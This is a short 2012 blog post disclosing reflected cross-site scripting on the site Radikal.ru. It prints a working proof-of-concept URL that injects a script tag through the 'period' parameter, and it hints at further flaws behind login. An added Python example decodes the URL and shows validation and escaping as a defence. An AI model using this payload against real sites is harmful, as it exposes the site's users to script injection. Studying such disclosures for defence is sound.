Sunday, 15 April 2012

Radikal.ru Cross Site Scripting

# Date: 15.04.2012
# Author: Sony
# Web Browser : Mozilla Firefox
# Site: http://insecurity.ro 
# PoC: 
 
http://st2tea.blogspot.com/2012/04/radikalru-cross-site-scripting.html 
..................................................................
 
Well, we have a cross-site scripting vulnerability on Radikal.ru.
 
What is Radikal.ru?
 
http://ru.wikipedia.org/wiki/Radikal.ru
 
There are multiple XSS vulnerabilities.
 
But I put only one in the archive, because it's simple to use.
 
http://www.radikal.ru/GALLERY/PageGallery.aspx?pg=258&period=022008%22%22%3E%3Cscript%3Ealert%28%22Radikal.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E&id_gallery=-1 
 
or 
 
http://codepad.org/qiZsoABI
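
The following is an added example, not part of the original post and not Radikal.ru's code: it decodes the PoC URL above to show which parameter carries the injected markup, then applies allowlist validation and HTML attribute encoding. The parameter formats (`period` as MMYYYY, numeric `pg` and `id_gallery`) and the `render_field` helper are assumptions inferred from the benign parts of the URL.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# PoC URL exactly as published in the post above.
POC_URL = ("http://www.radikal.ru/GALLERY/PageGallery.aspx?pg=258&period=022008"
           "%22%22%3E%3Cscript%3Ealert%28%22Radikal.ru%20Cross%20Site%20Scripting"
           "%22%29%3C/script%3E&id_gallery=-1")

# Assumed formats (not confirmed by the page): pg = page number,
# period = MMYYYY, id_gallery = integer that may be negative.
ALLOWED = {
    "pg": re.compile(r"\d{1,6}"),
    "period": re.compile(r"(0[1-9]|1[0-2])\d{4}"),
    "id_gallery": re.compile(r"-?\d{1,10}"),
}

def decode_params(url):
    """Return the URL-decoded query parameters as the server receives them."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[0] for name, values in qs.items()}

def rejected_params(params):
    """Names of parameters that are unknown or fail their allowlist pattern."""
    bad = []
    for name, value in params.items():
        pattern = ALLOWED.get(name)
        if pattern is None or not pattern.fullmatch(value):
            bad.append(name)
    return sorted(bad)

def render_field(period):
    """Hypothetical template fragment: the value is encoded for a
    double-quoted HTML attribute, so quotes and angle brackets stay data."""
    return '<input name="period" value="%s">' % html.escape(period, quote=True)

if __name__ == "__main__":
    params = decode_params(POC_URL)
    print("decoded period :", params["period"])
    print("rejected params:", rejected_params(params))
    print("encoded output :", render_field(params["period"]))
```

Validation rejects the request before rendering; the encoding step is the second layer for any value that does reach the page.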






Where are the other XSS on radikal.ru?
Use a login ;) You can see them when editing pics, etc.
It's simple.
 
 
 

 

